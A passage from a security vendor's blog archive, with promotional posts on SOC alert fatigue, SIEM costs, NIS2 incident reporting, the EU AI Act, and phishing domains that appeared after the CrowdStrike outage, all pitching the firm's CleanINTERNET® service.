can lead to remaining team members feeling overworked and anxious, creating a cycle of declining morale and further departures The Human Element: SOC Analysts’ Voices Research indicates that analysts value work that challenges them and leverages their problem-solving skills. When those skills are underused due to excessive alert volumes and false positives, analysts start to question their career paths. Over time, this dissatisfaction can result in higher resignation rates and difficulty in retaining top talent. A Proactive Solution: CleanINTERNET®  To mitigate alert fatigue and its downstream effects on employee retention, a shift from reactive to proactive security operations is essential. CleanINTERNET® offers a robust solution by filtering out noise and reducing alert volume through real-time global threat intelligence and AI-driven analysis.  Key Benefits for Retention: Reducing Repetitive Work: By cutting down on low-priority alerts, analysts can focus on high-value tasks, rekindling their engagement and satisfaction.Empowering Analysts: Automation tools enable SOC teams to act swiftly and confidently, enhancing job fulfilment.Work-Life Balance: A more manageable workload helps reduce burnout, allowing analysts to maintain a healthier work-life balance and stay motivated. For C-Suite leaders, addressing alert fatigue is about more than operational improvements—it's a strategic imperative to maintain a skilled, satisfied, and effective security team. Solutions like CleanINTERNET® provide the support needed to keep analysts engaged and motivated, ultimately strengthening the entire security framework and fostering long-term success.  Are your analysts at risk of burnout? Learn how CleanINTERNET® can empower your team and transform your SOC operations. --- ### [The Hidden Costs of a SIEM: The Need for a New Approach](https://www.centripetal.ai/blog/the-hidden-costs-of-siem-the-need-for-a-new-approach) Published: 2024-11-20 Summary: Logging and storing vast amounts of security data for analysis is integral to a SIEM’s function. However, this process brings hidden challenges. Maintaining robust cybersecurity defenses comes with significant costs, but one area that often exceeds is the ongoing administration of Security Information and Event Management (SIEM) systems. The expenses associated with logging, storing, and managing SIEM data can escalate rapidly, especially when compounded by compliance and regulatory requirements. What are these hidden costs and how can you mitigate them while also ensuring compliance?The Cost of SIEM Data Management Logging and storing vast amounts of security data for analysis is integral to a SIEM’s function. However, this process brings hidden challenges. Data Volume Growth: A medium-sized organization can generate terabytes of log data daily from various sources like firewalls, IDS/IPS, and endpoint detection systems. Managing and storing this data can cost hundreds of thousands annually. Infrastructure and Licensing Fees: Cloud-based storage and on-premises data centers come with substantial expenses. Taking storage costs as an example, a prerequisite under some regulations, a nominal 15GB of data could cost you about $24,000 per year in Microsoft Sentinel. If your SIEM is managing, logging and storing more data, this cost obviously increases. Some traditional SIEMs require proprietary data formatting and indexing, inflating costs even further.Operational Costs: Processing and analyzing this volume of data requires skilled analysts and powerful computational resources, adding to staffing and technology expenses.  Compliance and Regulatory RequirementsThe regulatory landscape is becoming more stringent, with frameworks like GDPR, HIPAA, and industry-specific mandates enforcing stricter data security and retention practices: Retention Periods: Regulations often require organizations to retain security logs for a specific period, ranging from 6 months to several years. For a company with large data volumes, this long-term storage increases both direct and indirect costs.Data Privacy: Compliance involves not just storing data but ensuring its protection. This adds layers of encryption, auditing, and access management, contributing further to financial and operational burdens.Audit Readiness: Regular compliance audits necessitate easy access to historical data. Companies must have well-structured storage solutions to retrieve relevant logs quickly, incurring additional costs for streamlined data management systems. Mitigating Costs with Strategic Solutions  The challenge for many organizations is balancing effective cybersecurity operations with cost and compliance demands. This is where solutions like CleanINTERNET® play a pivotal role: Reducing Data Volumes: By filtering out noise and pre-emptively blocking non-critical alerts, CleanINTERNET® reduces the volume of data entering the SIEM, leading to lower storage and processing costs.Optimizing Storage Solutions: Leveraging cloud storage with tiered approaches (e.g., hot, cold, and archival storage) allows for cost-effective management without sacrificing accessibility for compliance needs.Enhanced Efficiency: Automating alert prioritization ensures that only relevant data is stored long-term, aligning with both regulatory requirements and budget constraints. By adopting proactive solutions that reduce data volume and optimize storage strategies, C-Suite leaders can manage these costs effectively while maintaining compliance and operational efficiency.  Ready to streamline your SIEM operations and reduce the financial burden of compliance? Discover how CleanINTERNET® can transform your approach. Learn more.   --- ### [The Elements of Intelligence: Centripetal’s Journey in Ireland](https://www.centripetal.ai/blog/centripetals-journey-in-ireland) Published: 2024-10-23 Summary: This Thursday, October 24th, we are recognising not only our journey, but also the transformative power of intelligence by hosting our Second Annual Intelligence Summit in Galway. A Letter From Dave Silke, MD, Centripetal Europe Just over two years ago, Centripetal began its European journey in Galway, Ireland. What began in a small conference room has grown into a thriving office based at Platform 94’s innovation center in Mervue. Today, we are an ambitious and passionate team of network engineers, cyber analysts, R&D experts, and sales and marketing professionals—all united by a singular mission: harnessing intelligence to protect our customers' networks and their data from cyber attacks.  Though you may not be based in Ireland, the importance of intelligence—and specifically intelligence powered cybersecurity—extends far beyond borders. The advancements we are making at Centripetal, in Galway and across the globe, hold significant implications for organisations everywhere. Intelligence-based technologies are not just a local innovation; they are essential for safeguarding critical assets and protecting businesses worldwide, both now and for the future. Centripetal chose Galway as its European home as this city, and region, provides a unique blend of intelligences that we believe are critical to our future.   Technological Intelligence - Galway has long been a hub of technological innovation, and now is at the forefront of building cutting edge innovations in machine learning and artificial intelligence Emotional Intelligence - Known for its strong sense of community, this region fosters an understanding of the importance of relationships and the emotional connections between people  Creative Intelligence - Galway’s arts culture and creative energy fuel passion energy and innovation, bringing unique perspectives to problem-solving in this complex world.     This Thursday, October 24th, we are recognising not only our journey, but also the transformative power of intelligence by hosting our Second Annual Intelligence Summit in Galway. This event gathers global experts to explore intelligence's critical role in cybersecurity and the role of intelligence in driving maximum performance no matter the sector.  Centripetal’s Founder and COO, Jonathan Rogers, will discuss the Era of Intelligence—an era defined by the speed, accuracy, and proactive use of intelligence to defend businesses' most critical asset: data. Jonathan, who has been instrumental in Centripetal’s global expansion and the development of intelligence powered cybersecurity solutions, will share how we are entering a world where communities must share intelligence at unprecedented speeds, and the groundbreaking innovations we've developed to ensure that happens. Jonathan will be joined by Centripetal’s Chief Architect, Dave Ahn, who will cover the importance of Actionable Intelligence and the challenges facing companies in an automated world.  We’re also honored to host an extraordinary lineup of professionals who are leaders in using intelligence and data to maximise performance in their respective fields: Dr. Paul Catterson, Head of Medical at Newcastle United FC, will share how intelligence plays a pivotal role in predicting injuries, optimizing player performance, and driving marginal gains that collectively make a significant impact on success. At Newcastle United, the use of data and intelligence is a key focus for enhancing overall player performance, where even the smallest edges can define success at the highest level of global football. Dr. Catterson’s insights will offer a compelling look into how intelligence is shaping elite sports, highlighting the critical role it plays in maximising performance and pushing the boundaries of what’s possible in football. Michael Donoghue, Galway Hurling Senior Manager, will offer a powerful perspective on the role of emotional intelligence in elite sports, backed by his extensive experience with both Galway and Dublin Intercounty Hurling. As he prepares to return to manage Galway, Michael will discuss how the combination of data-driven insights and emotional intelligence is essential for achieving success at the highest levels of competition. Tim Hinchey, Former President & CEO of USA Swimming, will offer his expertise on the role of intelligence and data in driving elite performance on the global stage. As a passionate advocate for data-driven decision-making, Tim’s leadership during the Olympics was pivotal in elevating USA Swimming to international success. He will share how intelligence, combined with strategic decision-making, was instrumental in navigating the complexities of elite sports and driving success across multiple functions within the organization.   At Centripetal, we believe that intelligence is the key to driving progress—not just in cybersecurity, but across every industry—from classrooms and offices, to manufacturing facilities and critical infrastructure, and beyond. The Intelligence Summit offers a unique opportunity to come together, share insights, and explore how intelligence is shaping the future. But the impact of this conversation reaches far beyond the event itself—it’s about fostering a movement that transforms how businesses, communities, and entire industries approach security and innovation in the years to come. Thank you for joining us on this journey. We look forward to seeing many of you at the Intelligence Summit and for those of you not attending—we hope you’ll join our community and be part of the larger conversation right here as together we drive the future of intelligence powered innovation. Thank you, Dave Silke, MD, Centripetal Europe --- ### [Understanding Incident Reporting Under the NIS2 Directive: Key Insights for Managed Service Providers and Managed Security Service Providers](https://www.centripetal.ai/blog/understanding-incident-reporting-under-the-nis2-directive-key-insights-for-managed-service-providers-and-managed-security-service-providers) Published: 2024-09-05 Summary: Understanding incident reporting under the NIS2 Directive is critical for Managed Service Providers (MSPs) and Managed Security Service Providers (MSSPs) in the EU. In this blog, we provide key… Incident reporting is a crucial component of maintaining cybersecurity and operational resilience across the European Union. As outlined in Article 23 of the NIS2 Directive entities falling under its scope are required to report “significant incidents” to the CSIRT (Computer Security Incident Response Team or the relevant competent authority without undue delay. In Ireland, the NCSC encompasses the National/Governmental Computer Security Incident Response Team (CSIRT-IE) and will act as the main contact point for incident reporting under the NIS2 Directive, serving as the National Competent Authority. Defining a 'Significant Incident'For organizations in the sectors of ICT Service Management, Digital Infrastructure, and Digital Providers, including Managed Service Providers (MSPs) and Managed Security Service Providers (MSSPs), understanding what qualifies as a "significant incident" is crucial for compliance with the NIS2 Directive. This key legislative framework within the European Union offers a broad definition of an "incident" under Article 6(6). According to this article, an incident is defined as "any event that compromises the availability, authenticity, integrity, or confidentiality of stored, transmitted, or processed data, or the services offered by, or accessible via, network and information systems."Article 23(3) further clarifies that an incident is considered significant if it: (a) has caused, or is capable of causing, severe operational disruption of services or financial loss for the entity concerned; or (b) has affected, or is capable of affecting, other natural or legal persons by causing considerable material or non-material damage.While the NIS2 Directive sets out general criteria, it does not provide a specific definition of what constitutes a "significant" incident. This gap is addressed by the implementing regulation, officially published on 17 October 2024, which details criteria to help organizations assess whether an incident warrants mandatory reporting. The implementing regulation lays down rules for applying technical and methodological requirements for cybersecurity risk management measures and specific cases where an incident is considered significant. Covering sectors such as ICT Service Management (Business-to-Business), Digital Infrastructure, and Digital Providers, the regulation came into effect on October 18, 2024. Criteria for a Significant Incident under the Proposed Implementing RegulationAccording to Article 3 of the draft implementing regulation, an incident is considered significant if it meets one or more of the following conditions:Financial Loss: The incident has caused or is capable of causing financial losses exceeding EUR 500,000 or 5% of the entity’s annual turnover, whichever is lower.Exfiltration of Trade Secrets: The unauthorized access and potential exfiltration of trade secrets as defined in EU Directive 2016/943.Impact on Human Life and Health: The incident results in or could result in the death of a person or considerable damage to a person's health.Unauthorized Access: A successful and potentially malicious unauthorized access to network and information systems.Recurring Incidents: Even if individual incidents are not significant, they are considered significant when they recur at least twice within six months and share the same apparent root cause.Sector-Specific Criteria: The regulation also includes additional specific criteria for different sub-sectors, such as MSPs and MSSPs, which must also be considered when determining the significance of an incident (see Table 1). Table 1. Sector-Specific Criteria for a Significant Incident under the Implementing Regulation for Managed Service Providers and Managed Security Service ProvidersSectorCriteria for Significant IncidentManaged Service Providers and Managed Security Service ProvidersManaged service completely unavailable for >30 minutes.The availability of the managed service is limited for >5% or 1 million users for >1 hour.Data integrity, confidentiality, or authenticity compromised due to malicious action or impacting >5% users or 1 million users. Exclusions and Special ConsiderationsScheduled interruptions and planned maintenance-related service downtimes are not considered significant incidents. This distinction separates routine service interruptions from genuine security or operational failures that require reporting. Who Needs to Be Notified?Entities affected by significant incidents based on the criteria above are required to notify their CSIRT or relevant competent authority. They must also inform service recipients about significant cyber threats that could impact them and suggest any appropriate response measures (Article 23(1)). How to Report a Significant IncidentAll relevant entities must submit the following reports to the CSIRT or competent authority:An early warning within 24 hours of becoming aware of the significant incident, indicating whether the incident is suspected of being caused by unlawful or malicious acts or could have a cross-border impact.An incident notification within 72 hours of becoming aware of the significant incident, updating information provided in the early warning and including, indicate an initial assessment including its severity and impact, and the indicators of compromise.An intermediate report if requested by the CSIRT, providing relevant status updates.A final report no later than one month after the submission of the incident notification, detailing the incident, its severity, impact, the likely threat or root cause, mitigation measures applied or ongoing, and the cross-border impact of the incident where applicable, In the event of an ongoing incident, entities must provide a progress report at the time of the submission of the final report and a final report within one month of handling the incident. How Centripetal Supports Compliance with Incident Reporting RequirementsCentripetal helps organizations reduce the frequency of incidents and the need for extensive reporting through our CleanINTERNET® solution. By offering a robust network security solution and proactive monitoring, we address Recitals 12 and 18 of the implementing regulation. Our solution not only enhances threat detection, including defense against network-based attacks like DDoS, but also supports incident reporting. In the event of an incident, Centripetal aids in comprehensive reporting by supplying detailed logs, data, and expert analyses of your organization's network traffic. Advanced Threat Detection and ReportingCleanINTERNET® employs deep packet inspection and behavioral analysis to detect and investigate complex threats at the perimeter of your entities network. It delivers a thorough overview of inbound and outbound threats and supplies the detailed logs and data needed for accurate incident reporting. Augmented Human AnalysisOur Security Operations team, supported by our AI Analyst, delivers in-depth reports on security alerts, combining human expertise with advanced technology for thorough incident evaluation. CleanINTERNET® enhances the analysis and contextual understanding of security events, including whether alerts were blocked or monitored, relevant threat intelligence, and a timeline of activity. Key Benefits of CleanINTERNET®Proactive Threat Detection: CleanINTERNET® provides real-time, automated protection using over 100 billion indicators of compromise, ensuring that threats are identified and blocked before they can enter your network, thus minimizing the need for reactive incident reporting. Actionable Threat Intelligence: The solution integrates the largest collection of high-confidence threat intelligence, updated every 15 minutes. This continuous feed of actionable intelligence helps organizations stay ahead of potential incidents and provides crucial details for accurate and timely reporting.Real-Time Enforcement: CleanINTERNET® utilizes the fastest packet filtering technology, with latency of less than 50 microseconds, to dynamically block threats. This real-time enforcement reduces the number of incidents requiring reports by preventing malicious activities from reaching your network. Centripetal not only secures your network, minimizes incidents, and optimizes IT resource management but also enhances the incident reporting process. By supplying the necessary logs, data, and expert insights, we help organizations prepare comprehensive reports for CSIRT or competent authorities. This approach streamlines your path to NIS2 compliance, reduces operational burdens, and allows your organization to focus on core objectives.To learn more about CleanINTERNET®, click here. --- ### [A Network Defense Layer That Actually Works](https://www.centripetal.ai/blog/a-network-defense-layer-that-actually-works) Published: 2024-08-23 Summary: Despite heavy investments in cybersecurity, enterprises continue to face rising cyber threats, with traditional firewalls proving insufficient against sophisticated attacks. Centripetal’s… Enterprises invest heavily in cybersecurity measures to protect their critical assets and sensitive data. According to the Worldwide Security Spending Guide published by International Data Corporation (IDC), European security spending will grow by 12.3% in 2024, similar trajectory to the US and Asia Pacific. Despite these investments, crippling vulnerabilities continue to wreak havoc, and the costs of cyber attacks continue to soar. This reality underscores a critical point: a single layer of defense is no longer sufficient. The concept of a multi-layered defense strategy has become a cornerstone in the cybersecurity community, providing diverse tiers of protection to mitigate the wide array of threats faced by organizations.The Growing Threat Landscape Cyber threats are evolving at an unprecedented pace, outstripping the capabilities of traditional defense mechanisms. The annual average cost of cybercrime is predicted to hit more than $23 trillion in 2027, up from $8.4 trillion in 2022, according to Anne Neuberger, U.S. Deputy National Security Advisor. Even as enterprises ramp up their cybersecurity budgets, breaches continue to occur, often with devastating consequences. The reasons for this are manifold, but a significant factor is the exploitation of vulnerabilities in firewalls and network devices. In recent years, such exploits have become a more prevalent attack vector than phishing, a primary concern for security professionals. Firewalls and their next generation equivalents are often seen as the frontline defense against cyberattacks. They are designed to block unauthorized access and filter out harmful traffic. However, as has been demonstrated repeatedly, firewalls alone are not impenetrable. They can be bypassed through sophisticated attack methods e.g., advanced persistent threats (APTs), vulnerability exploitation, and malware hidden in encrypted traffic, rendering them inadequate as a first line of defense. This exposure necessitates additional layers of defense— that can provide comprehensive monitoring and protection beyond the capabilities of a traditional firewall.The Need for Multi-Layered DefenseA multi-layered defense strategy involves deploying multiple security controls at different points within the IT infrastructure. This approach not only creates redundancy but also ensures that if one layer fails, others are in place to catch potential threats, providing contingency and cover. The idea is akin to having multiple lines of defense in a castle; if an attacker breaches the outer walls, they must still contend with inner defenses before reaching the core.The Missing Layer You Need Centripetal’s CleanINTERNET® offers a unique and essential layer of defense that complements existing security measures. This technology leverages adaptive, real-time, threat intelligence feeds from a wide array of sources across the industry. By continuously monitoring every data packet entering or leaving the network, CleanINTERNET® can identify and neutralize threats before they can cause harm. What sets CleanINTERNET® apart is its use of unparalleled volumes of IoCs (Indicators of Compromise). These are known patterns or behaviors associated with malicious activities, such as specific IP addresses, domains, or file hashes. CleanINTERNET® compares network traffic against a comprehensive database of IoCs, allowing it to detect and block malicious activity in real time. This pre-emptive approach ensures that even the most subtle and sophisticated attacks can be identified and mitigated. Unlike traditional firewalls, CleanINTERNET® functions as a threat aware external defensive layer. It acts as a buttress, providing an additional line of defense that protects against threats that often slip past other security measures. By operating outside the firewall, CleanINTERNET® can block threats at the perimeter, preventing them from infiltrating the network.Immediate Benefits for Enterprises The implementation of CleanINTERNET® yields immediate and tangible benefits for enterprises. One of the most significant advantages is the dramatic reduction in security events. By effectively filtering out malicious traffic, CleanINTERNET® reduces the noise that often overwhelms security operations centers. This patented technology not only decreases the workload for security teams but also allows them to focus on more critical issues rather than getting bombarded by false positives. Another crucial benefit is the elimination of reconnaissance traffic. Reconnaissance is often the first stage of a cyberattack, where attackers gather information about their target to identify vulnerabilities. By blocking this traffic, CleanINTERNET® disrupts the attackers’ ability to plan and execute their strategies, thereby preventing potential breaches. Moreover, CleanINTERNET® is adept at detecting and eradicating outbound traffic to command-and-control servers. Such traffic is a hallmark of compromised systems, where malware communicates with an external server for instructions or data exfiltration. By intercepting this communication, CleanINTERNET® can prevent data breaches and stop malware in its tracks.Enhancing Security PostureThe net effect of incorporating CleanINTERNET® into a cybersecurity strategy is a significantly improved security posture. By adding an external layer of defense, organizations are better equipped to handle the evolving threat landscape. This enhancement not only protects the organization’s data and assets but also provides peace of mind to stakeholders, knowing that a robust, multi-layered defense strategy is in place. Furthermore, the use of advanced threat intelligence and real-time monitoring reduces the likelihood of successful attacks, thereby lowering the risk to the organization. This reduction in risk is not just about preventing immediate financial loss; it also protects the organization’s reputation, customer trust, and long-term viability.Enterprise Defense In cybersecurity, unfortunately there is no silver bullet. No single technology can provide complete protection against all threats. However, by adopting a multi-layered defense strategy and incorporating advanced solutions like Centripetal’s CleanINTERNET®, enterprises can significantly enhance their security posture. CleanINTERNET® offers the critical external defensive layer that organizations need to protect themselves in an increasingly hostile digital environment. By providing comprehensive monitoring, preemptive threat detection, and real-time response capabilities, CleanINTERNET® ensures that enterprises are not only defended but also resilient against the ever-evolving cyber threats. To learn more about CleanINTERNET®, click here. --- ### [The EU AI Act: Ensuring Cybersecurity and Trustworthiness in High-Risk AI Systems](https://www.centripetal.ai/blog/the-eu-ai-act-ensuring-cybersecurity-and-trustworthiness-in-high-risk-ai-systems) Published: 2024-08-15 Summary: As the AI Act garners increasing attention, it's crucial for organizations to determine if they fall within its scope and assess the risks associated with their AI systems. With high-risk AI systems… Artificial Intelligence (AI) has come a long way since John McCarthy first coined the term in 1955. Today, as AI technologies become deeply embedded in our daily lives, the potential they hold is immense - but so are the risks to safety, privacy, and fundamental human rights. Recognizing these concerns, the European Union (EU) took a proactive step in 2021 by proposing a regulatory framework aimed at governing AI. This initiative culminated in the European Artificial Intelligence Act (AI Act), published on July 12, 2024, in the Official Journal of the European Union. The Act came into force on August 1, 2024, and will be implemented in phases over the next two to three years. As the world’s first comprehensive AI regulatory framework, the AI Act is designed to ensure that AI systems deployed within the EU are safe, ethical, and aligned with the protection of individual rights. The primary goals of this legislation are to safeguard health, safety, and fundamental rights while also encouraging innovation and the adoption of reliable AI technologies.Who does this apply to?The AI Act applies to all providers, deployers, importers, distributors, and manufacturers of AI systems operating within the EU or offering their services to the EU market, regardless of their location, with specific provisions for high-risk AI systems and certain exemptions for national security, military, and research purposes.What is an ‘Artificial Intelligence System’?Aligning with the OECD definition, Article 3(1) of the AI Act defines an ‘AI system’ as a machine-based system designed to function with varying levels of autonomy, potentially exhibiting adaptiveness post-deployment. It processes input to generate outputs—such as predictions, content, recommendations, or decisions—capable of influencing both physical and virtual environments, whether for explicit or implicit objectives.Risk-Based ClassificationThe AI Act adopts a risk-based approach, classifying AI systems according to the level of risk they present to users—ranging from unacceptable risk, high risk, specific transparency risk and minimal risk. The guiding principle is straightforward: the higher the risk, the stricter the regulations.Prohibited AI SystemsArticle 5 of the AI Act prohibits AI systems deemed to carry unacceptable risks, including those that manipulate individuals or exploit vulnerabilities like age, disability, or economic status. The ban also covers ‘real-time’ remote biometric identification systems, social scoring systems, emotional recognition in workplaces or education, and indiscriminate facial recognition data collection.High-Risk AI Systems High-risk AI systems, as outlined in Article 6 and Annex III of the AI Act, are allowed but must meet strict regulations due to their potential impact on health, safety, and fundamental rights. These high-risk systems include those used in critical infrastructure like transportation, education, healthcare, as well as in law enforcement, migration, and the administration of justice. To address these risks, the AI Act requires a robust risk management framework for these AI systems before they can enter the market. Key requirements include:Risk Management System: Implementing an effective risk assessment, evaluation, and appropriate mitigation measures based on residual risks (Article 9)Data Governance: Adherence to stringent data and data governance practices during AI model training, testing, and validation (Article 10).Technical Documentation: Comprehensive documentation detailing the AI system's design and functionality (Article 11).Record-Keeping: Maintaining detailed records of the AI system's operations (Article 12).Transparency: Ensuring transparency throughout the AI system's design and development stages (Article 13).Human Oversight: Integrating human oversight to monitor AI decisions and actions (Article 14).Accuracy, Robustness, and Cybersecurity: Demonstrating high levels of accuracy, robustness, and cybersecurity (Article 15). Transparency Transparency is a fundamental principle of the AI Act, especially for AI systems that interact directly with people, like chatbots or content-generating tools. Providers and Deployers must clearly disclose when individuals are interacting with AI and marking AI-generated or manipulated content (Article 50).Minimal RiskArticle 95 of the Act addresses minimal risk AI systems, such as spam filters and video games, by promoting the voluntary adoption of codes of conduct. Although these systems are not subject to mandatory regulations, they are encouraged to adhere to ethical standards and best practices to foster responsible AI development. The report by AI4People Institute (2024) highlights strategies for designing, developing, and maintaining AI systems that respect fundamental rights and uphold ethical and moral principles in line with European Union values.Obligations for High-Risk AI SystemsThe AI Act establishes specific obligations for all stakeholders in the AI lifecycle, including providers, importers, and distributors. Providers are required to ensure their AI systems meet the Act's standards before market introduction, which includes clear labelling of high-risk systems (Article 16), implementing a quality management system (Article 17), maintaining documentation (Article 18), managing system logs (Article 19), conducting conformity assessments (Article 43), affixing CE markings (Article 48), and issuing an EU declaration of conformity (Article 47). Importers and distributors must also verify compliance and maintain proper records (Articles 23-24). These regulations ensure that every participant in the AI supply chain upholds uniform safety and compliance standards.Regulation of General-Purpose AI ModelsThe AI Act outlines regulations for General-Purpose AI (GPAI) Models, which are versatile systems designed to perform various tasks in different settings. Providers of GPAI models must maintain comprehensive technical documentation, including training and testing details, and provide extensive information for integration with other AI systems. They must also adhere to copyright laws as specified in Article 4(3) of Directive (EU) 2019/790 and publicly disclose a summary of their training data. GPAI models with substantial computational power or impact are deemed to pose systemic risk if they involve over 10^25 floating point operations. These models must fulfil additional requirements, including risk evaluation, incident reporting, and robust cybersecurity measures (Article 55).Enforcement and PenaltiesThe AI Act establishes a European Artificial Intelligence Board and AI Office to oversee its implementation and drive the development of AI standards. National Competent Authorities are tasked with applying and enforcing the Act, with significant fines for non-compliance:Up to 35 million or 7% of global annual turnover for the most serious infringements such as the use of prohibited AI practices.Up to 15 million or 3% of global annual turnover for non-compliance with specific obligations related to high-risk AI systems.Up to 7.5 million or 1.5% of global annual turnover for supplying incorrect information to authorities. Support for InnovationTo foster innovation while ensuring compliance, the AI Act introduces regulatory sandboxes enabling controlled experimentation with AI technologies (Article 57). These sandboxes offer a secure environment where businesses, especially SMEs and startups, can test and refine new AI solutions without the immediate pressure of regulatory constraints.Cybersecurity for High-Risk AI Systems: Protecting Against Threats with Centripetal's CleanINTERNET® SolutionThe AI Act will affect a broad spectrum of stakeholders involved with artificial intelligence, from developers to end-users. Compliance with the AI Act’s comprehensive requirements is crucial to ensuring the safety, effectiveness, and trustworthiness of AI technologies.Ensuring Cybersecurity for High-Risk AI SystemsEnsuring robust cybersecurity for high-risk AI systems is crucial to protecting them from malicious attacks that could compromise their performance or data integrity. According to the AI Act, specifically Article 15(5), providers must fortify these systems against unauthorized alterations and cyberattacks, including threats like data poisoning, adversarial attacks, and breaches targeting AI-specific components. Implementing comprehensive cybersecurity measures is essential for compliance and maintaining the integrity and reliability of AI solutions. By prioritizing these protections, organizations can effectively mitigate risks and enhance the resilience of their AI systems against evolving cyber threats.How can Centripetal help?Centripetal's CleanINTERNET® solution offers a powerful way to comply with the AI Act's stringent cybersecurity requirements for high-risk AI systems. By leveraging augmented intelligence analysis, advanced threat detection, and real-time intelligence application, CleanINTERNET® provides proactive and robust protection against evolving cyber threats. Its advanced threat intelligence integration and deep packet inspection ensure that AI systems are shielded from sophisticated attacks like data poisoning and adversarial threats. With seamless deployment and a proactive defense strategy, Centripetal helps organizations not only meet regulatory standards but also enhance their overall cybersecurity posture, ensuring the integrity and reliability of their AI solutions. For more information on how your organization can effectively manage AI Act compliance and enhance cybersecurity for high-risk AI systems, contact us. --- ### [Enhanced CleanINTERNET® Protections to Combat Subsequent Threats from the CrowdStrike Outage](https://www.centripetal.ai/blog/enhanced-cleaninternet-protections-to-combat-subsequent-threats-from-the-crowdstrike-outage) Published: 2024-07-23 Summary: Discover how Centripetal swiftly enhanced its CleanINTERNET® protections following the CrowdStrike outage on 19-July-2024. Learn how cybercriminals exploited this incident with phishing attacks and… Sean Moore - Ph.D. CTO and VP ResearchLast week (19-July-2024), a significant IT outage occurred because CrowdStrike distributed a faulty update to its Falcon security software running on millions of computers using the Microsoft Windows operating system. This faulty update caused many of these computers to crash, which interrupted the operations of businesses across the globe. Cybercriminals acted quickly to exploit this incident by immediately launching phishing campaigns designed to trick users into, e.g., downloading malware, providing sensitive information such as login credentials and personal information, etc. Concurrently, however, Centripetal acted just as quickly to enhance its CleanINTERNET® service to proactively protect you from these phishing attacks. This Centripetal security update bulletin provides you with some insight into these protections and how they work.The CrowdStrike phishing attacks are enabled by using fake domain names and associated websites that spoof legitimate CrowdStrike domain names and associated websites. For example, Centripetal observed that cybercriminals began registering domain names in the Internet DNS that spoofed the legitimate “crowdstrike[.]com” domain name, such as “crowdstrike-helpdesk[.]com”, “crowdstrike0day[.]com”, “crowdstrikefix[.]com”, “crowdstrikeoutage[.]info”, … In a typical phishing attack, the cybercriminals will send out emails that may trick users into clicking on URL links containing these deceptive domain names, thereby launching the phishing attacks. However, CleanINTERNET® will proactively shield users and their networks from these attacks by first detecting in real-time the spoofed CrowdStrike domain names in Internet communications packets and then halting the transmission of these packets to their destinations (e.g., a faked CrowdStrike website that harvests users’ credentials).To detect these spoofed domain names in packets, CleanINTERNET® collects and generates cyber threat intelligence (CTI) feeds, or lists, composed of several hundred to a few thousand CrowdStrike spoofed domain names. CleanINTERNET® then filters each in-transit Internet packet through these CTI lists to shield against CrowdStrike-targeted phishing attacks. The CrowdStrike spoofed domain names and associated CTI feeds are created by multiple methods, including:Reports from CrowdStrike and other CTI providers on CrowdStrike spoofed domain names observed on the Internet;Centripetal’s patented technology for detecting spoofed domain names, which is applied to feeds of domain names that have been recently registered in the Internet DNS. This patented technology has been continually identifying new spoofed CrowdStrike domain names that are being registered by cybercriminals since the 19-July outage incident. Thus, Centripetal was likely the first to identify many of these new CrowdStrike spoofed domain names;Centripetal’s patented AI technology for predicting spoofed CrowdStrike domain names that cybercriminals may generate in the future. The AI has been trained to think like cybercriminals who want to launch CrowdStrike phishing attacks. It proactively generates spoofed CrowdStrike domain names before the cybercriminals think them up and register them in the DNS. Additionally, Centripetal has real-time alerting mechanisms that immediately signal Centripetal’s Security Operations team whenever a CrowdStrike phishing attack is detected and shielded.These CrowdStrike-specific protections have been deployed into CleanINTERNET® before, during, and after 19-July and are continually updated as new CrowdStrike CTI emerges. Centripetal will continue to enhance these CrowdStrike protections as well as protections for other new and existing targets of phishing attacks.At Centripetal, we take a proactive approach to protecting our customers, offering a distinct advantage to all CleanINTERNET® users. By leveraging artificial intelligence to create and augment threat intelligence feeds, we provide multiple layers of protection and a greater level of cybersecurity assurance.Thank you for your continued trust in Centripetal. We are committed to maintaining the highest standards.If you are interested in AI-powered protection from fake web domains or are concerned about your own brand protection, please contact us at sales@centripetal.aiRequest Demo --- ### [Take Action Now on NIS2 Directive](https://www.centripetal.ai/blog/take-action-now-on-nis2-directive) Published: 2024-07-19 Summary: Have Your Say: Shape EU Cybersecurity Regulations with Your Feedback on NIS2 Directive Draft Implementing Regulations by July 25, 2024. "Have Your Say: Comment on the NIS2 Cybersecurity Risk Management Draft Regulations by July 25, 2024"It's time to 'Have Your Say' on the future of cybersecurity regulations in the European Union. The draft implementing regulation for the NIS2 Directive is now open for public feedback through the 'Have Your Say' portal until July 25, 2024. This consultation period allows stakeholders to contribute to refining the regulation, with all feedback shaping the final regulations. What is the purpose of the Implementing Regulation?The draft regulation outlines specific rules for applying the NIS2 Directive, focusing on details for the technical and methodological requirements for cybersecurity risk management measures. It further sets criteria for identifying significant incidents affecting various providers. Failure to comply with these requirements may result in essential entities subject to fines up to €10,000,000 or at least 2% of the total worldwide annual turnover and important entities subject to fines up to €7,000,000 or at least 1.4% of the total worldwide annual turnover. Who is in scope of the Regulation?The regulation applies to DNS service providers, TLD name registries, cloud computing service providers, data centre service providers, content delivery network providers, managed service providers, managed security service providers, providers of online marketplaces, of online search engines and of social networking services platforms, and trust service providers (“relevant entities”). These relevant entities play critical roles in the Digital Infrastructure, ICT Service Management, and Digital Provider Sectors. When will the regulation be implemented?The new draft regulation is set to be finalised before October 17, 2024. On this same date, NIS2 will also be transposed into Irish law. Starting October 18, 2024, the implementing regulation's requirements will directly apply to all relevant entities. This timing underscores the regulation's critical importance for compliance and cybersecurity. Cybersecurity Risk Management Measures The NIS2 Directive mandates that critical national infrastructure entities implement 10 essential cybersecurity risk management measures, detailed in 13 specific items within the draft implementing regulation. Relevant entities are required to report a ‘significant incident’ to competent authorities within a timely manner. To effectively prepare for compliance and enhance cybersecurity resilience, entities should consider implementing the following measures based on European and International Standards:Information Security Policy:An effective Information Security Policy should align with security objectives and business goals, include risk tolerance levels, top-level policies list, required documentation and ensure compliance through regular updates, and defined responsibilities.Risk Management Policy:This involves creating a risk management framework, communicating clear procedures for risk analysis and treatment, performing risk assessments, identifying risk owners, and using standards-based methodologies. Regular reviews and updates ensure that the organization adapts to new threats and maintains high security standards, taking into account cyber threat intelligence.Incident Handling:Organizations should establish a detailed Incident Handling Policy outlining roles, responsibilities, and procedures for detecting, analyzing, containing, responding to, recovering from, documenting, and reporting incidents. Relevant entities should implement practices like monitoring, logging, event reporting, incident response procedures, and post-incident reviews to effectively detect, respond to, and prevent incidents.Business Continuity, Backup and Crisis Management:Establishing and maintaining business continuity, disaster recovery, backup management, and crisis management plans, regularly testing and updating them to ensure readiness for incidents and disruptions.Supply Chain Security:Establish, implement, and apply a supply chain security policy, including criteria for selecting and contracting suppliers based on 